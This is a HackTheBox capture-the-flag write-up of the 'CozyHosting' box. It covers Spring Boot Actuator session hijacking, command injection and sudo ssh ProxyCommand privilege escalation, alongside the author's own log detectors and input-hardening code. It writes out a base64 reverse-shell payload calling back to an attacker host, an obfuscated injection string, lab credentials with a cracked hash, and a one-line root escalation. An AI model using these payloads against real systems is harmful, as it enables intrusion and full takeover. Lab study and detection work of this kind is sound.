Tags: HackTheBox, Spring Boot, Command Injection, PostgreSQL, Privilege Escalation

HTB - CozyHosting

Exploiting Spring Boot Actuator, session hijacking, command injection and privilege escalation via SSH ProxyCommand.

2024-02-20 Easy HackTheBox

Reconnaissance

# /etc/hosts
10.10.11.230 cozyhosting.htb

nmap -p- --open -sV -v 10.10.11.230

Open ports:

  • 22/tcp — SSH OpenSSH 8.9p1 Ubuntu
  • 80/tcp — HTTP nginx 1.18.0

Web Enumeration

ffuf -u http://cozyhosting.htb/FUZZ -w wordlists/dicc.txt -mc 0-299 -fs 0

Spring Boot Actuator endpoints discovered:

  • actuator/sessions — Active sessions
  • actuator/mappings — Application routes
  • actuator/env — Environment variables
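Exposed actuator endpoints are easy to spot after the fact in the reverse proxy logs. The following detector is an added example written for this write-up, not code from the box or from Spring Boot: it parses nginx "combined" access log lines (the sample lines are constructed) and reports every request that was actually served (2xx) from one of the three sensitive endpoints found above.

```python
import re

# Actuator endpoints that leak session ids, routes or configuration when
# they are reachable without authentication (the three found on this box).
SENSITIVE_ACTUATOR = ("/actuator/sessions", "/actuator/env", "/actuator/mappings")

# nginx "combined" format: ip ident user [time] "METHOD path proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)


def find_actuator_hits(lines, sensitive=SENSITIVE_ACTUATOR):
    """Return (ip, path, status) for each request that reached a sensitive
    actuator endpoint with a 2xx status, i.e. the data was really served."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        # drop the query string and a trailing slash before comparing
        path = m.group("path").split("?", 1)[0].rstrip("/")
        status = int(m.group("status"))
        if path in sensitive and 200 <= status < 300:
            hits.append((m.group("ip"), path, status))
    return hits


# Constructed sample lines (not taken from the box). The 401 line shows why the
# status check matters: a denied request is noise, a served one is an incident.
SAMPLE_LOG = [
    '10.10.14.5 - - [20/Feb/2024:10:01:12 +0000] "GET /actuator/sessions HTTP/1.1" 200 512 "-" "curl/8.4.0"',
    '10.10.14.5 - - [20/Feb/2024:10:01:13 +0000] "GET /login HTTP/1.1" 200 2048 "-" "curl/8.4.0"',
    '10.10.14.5 - - [20/Feb/2024:10:01:20 +0000] "GET /actuator/env?pretty HTTP/1.1" 200 8192 "-" "curl/8.4.0"',
    '10.10.14.5 - - [20/Feb/2024:10:01:21 +0000] "GET /actuator/env HTTP/1.1" 401 0 "-" "curl/8.4.0"',
    '10.10.14.7 - - [20/Feb/2024:10:05:00 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "kube-probe/1.28"',
]

if __name__ == "__main__":
    for ip, path, status in find_actuator_hits(SAMPLE_LOG):
        print(f"ALERT {ip} read {path} (HTTP {status})")
```

The fix on the application side is to restrict `management.endpoints.web.exposure.include` to `health` (and put anything else behind authentication); the detector is what tells you whether that fix came too late.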

Exploitation — Session Hijacking + Command Injection

http://cozyhosting.htb/actuator/sessions
→ 08EF47D7E71ACE1ABBBF204F8E9726FF "kanderson"

Replace the session cookie with the hijacked value to reach /admin. Command injection via /executessh:

echo 'bash -i -p >& /dev/tcp/LHOST/4444 0>&1'|base64

nc -nlvp 4444
# POST /executessh
# host=10.10.11.230&username=x;`echo${IFS}<base64>|base64${IFS}-d|bash`
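The injection works because the username ends up inside a shell command line. The hardening pattern is to validate both fields against a strict allow-list and hand them to the ssh binary as an argv list, so no shell ever parses them. The block below is an added illustration in Python, not the application's Java code: `build_ssh_command_unsafe` only returns the concatenated string to show the flawed pattern, `build_ssh_argv_safe` is the hardened counterpart, and the regexes, option names and `run_ssh_check` wrapper are my own choices.

```python
import re
import subprocess

# Allow-lists: a conservative POSIX username and a DNS hostname or IPv4 literal.
# Neither admits ';', '`', '$', whitespace or a leading '-' (which ssh would
# otherwise read as an option such as -oProxyCommand=...).
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)


def build_ssh_command_unsafe(host, username):
    """The pattern behind /executessh: user input concatenated into a string
    that is later given to a shell. Returned as a string only, never executed."""
    return f"ssh {username}@{host}"


def is_valid_ssh_target(host, username):
    """True only when both fields match the allow-lists in full."""
    return bool(USERNAME_RE.fullmatch(username)) and bool(HOSTNAME_RE.fullmatch(host))


def build_ssh_argv_safe(host, username):
    """Validate, then build an argv list. Each element reaches execve() verbatim,
    so shell metacharacters are inert even if validation were loosened."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError(f"invalid username: {username!r}")
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"invalid host: {host!r}")
    return [
        "ssh",
        "-o", "BatchMode=yes",       # never prompt; fail fast on an interactive check
        "-o", "ConnectTimeout=5",
        f"{username}@{host}",
    ]


def run_ssh_check(host, username):
    """Run the hardened command without a shell (shell=False is the default for a list)."""
    argv = build_ssh_argv_safe(host, username)
    return subprocess.run(argv, capture_output=True, text=True, timeout=10, shell=False)


if __name__ == "__main__":
    # Constructed inputs: the second mirrors the payload shape used on this box.
    for host, user in [("cozyhosting.htb", "josh"), ("10.10.11.230", "x;`id`")]:
        print(host, user, "->", "accepted" if is_valid_ssh_target(host, user) else "rejected")
```

Validation and argv construction are two independent layers: the allow-list stops the request at the controller, and the argv form means a future relaxation of the regex still cannot reintroduce shell parsing.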

Post-exploitation

# on the target (from the reverse shell), in the directory holding the jar
python3 -m http.server 8888
# on the attacking machine
wget http://10.10.11.230:8888/cloudhosting-0.0.1.jar
unzip cloudhosting-0.0.1.jar

Extracting the PostgreSQL credentials:

grep -irE '(password|pwd|pass)[[:space:]]*=[[:space:]]*[[:alpha:]]+' *
# spring.datasource.password=Vg&nvzAQ7XxR
# upgrade the reverse shell to a TTY so psql can prompt for the password
python3 -c 'import pty;pty.spawn("/bin/bash")'
psql -h localhost -U postgres
\c cozyhosting
select * from users;

admin hash: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm

hashcat -m 3200 hash rockyou.txt
# manchesterunited

ssh josh@10.10.11.230

Privilege Escalation — SSH sudo

sudo -l
# (root) /usr/bin/ssh *

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
cat /root/root.txt
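A sudo rule that allows `/usr/bin/ssh *` is root on demand, and the only durable fix is removing the rule. Until then, the sudo syslog line records the full command, which makes the abuse easy to flag. The detector below is an added example for this write-up (not from the box): it parses sudo's default log line format (sample lines are constructed) and reports any sudo-run ssh whose options execute a local command.

```python
import re

# sudo's default syslog line, e.g.
# "Feb 20 12:00:00 host sudo:  josh : TTY=pts/0 ; PWD=/home/josh ; USER=root ; COMMAND=/usr/bin/ssh ..."
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<command>.*)$"
)

# ssh client options that run a local command; any of them turns "sudo ssh"
# into a root shell. "-F" is listed because a user-supplied config file can
# carry the same options without them appearing on the command line.
DANGEROUS_MARKERS = ("proxycommand", "localcommand", "permitlocalcommand", "knownhostscommand", " -f ")


def flag_sudo_ssh(lines):
    """Return (invoking_user, target_user, marker) for each sudo-run ssh that
    carries a local-command option or a custom config file."""
    findings = []
    for line in lines:
        m = SUDO_RE.search(line)
        if not m:
            continue  # not a sudo command record
        cmd = m.group("command")
        prog = cmd.split(None, 1)[0]
        if prog != "ssh" and not prog.endswith("/ssh"):
            continue  # only ssh invocations are of interest here
        lowered = " " + cmd.lower() + " "
        for marker in DANGEROUS_MARKERS:
            # "-f" is case-sensitive in ssh (-f forks, -F loads a config file),
            # so check it against the original command, the rest case-insensitively
            hit = (" -F " in " " + cmd + " ") if marker == " -f " else (marker in lowered)
            if hit:
                findings.append((m.group("user"), m.group("target"), marker.strip()))
                break
    return findings


# Constructed sample lines (not from the box); the first mirrors the escalation above.
SAMPLE_AUTH_LOG = [
    "Feb 20 12:00:01 cozyhosting sudo:     josh : TTY=pts/0 ; PWD=/home/josh ; USER=root ; COMMAND=/usr/bin/ssh -o ProxyCommand=;sh 0<&2 1>&2 x",
    "Feb 20 12:00:05 cozyhosting sudo:     josh : TTY=pts/0 ; PWD=/home/josh ; USER=root ; COMMAND=/usr/bin/ssh backup@10.0.0.9",
    "Feb 20 12:00:07 cozyhosting sudo:     josh : TTY=pts/0 ; PWD=/home/josh ; USER=root ; COMMAND=/usr/bin/ssh -F /tmp/cfg backup@10.0.0.9",
    "Feb 20 12:00:09 cozyhosting sudo:     josh : TTY=pts/0 ; PWD=/home/josh ; USER=root ; COMMAND=/usr/bin/apt update",
]

if __name__ == "__main__":
    for user, target, marker in flag_sudo_ssh(SAMPLE_AUTH_LOG):
        print(f"ALERT {user} ran ssh as {target} with {marker}")
```

The second sample line shows the legitimate use case the rule was presumably written for; a sudoers entry that pins the exact arguments (`/usr/bin/ssh backup@10.0.0.9`) instead of `*` keeps that use and removes the escalation.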